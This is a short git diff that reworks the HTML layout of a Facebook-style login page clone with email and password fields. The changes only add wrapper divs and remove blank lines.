added and cleaned up the code plus re designing the face book clone

--- a/about.html
+++ b/about.html
@@ -7,13 +7,15 @@
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>facebookLogin page</title>
+  
 <div class="header">
     <h1 class="head">Facebook</h1>
 </div>
 
 
 </head>
-<body>
+<body >
+   <div class="all">
 <div class="content">
 <h3 class="h3">Login to use your Facebook account with SocialPass</h3>
 <div class="form">
@@ -21,7 +23,7 @@
 
 
     Email or Phone: <input id="email" class="input2" type="email or number"/>
-    <div class="items"></div>
+    <div class="items">
 Password:
 
  <input id="pwd" class="input1" type="password"/></div>
@@ -37,23 +39,8 @@ Password:
 <a href="">Sign up for Facebook</a></div>
 <span>Forgotten your password? </span>
 </div>
-
-
-
 </div>
-
-
-
-
-
-
-
-
-
-
-
-
-   
+</div>
 </body>
 
 
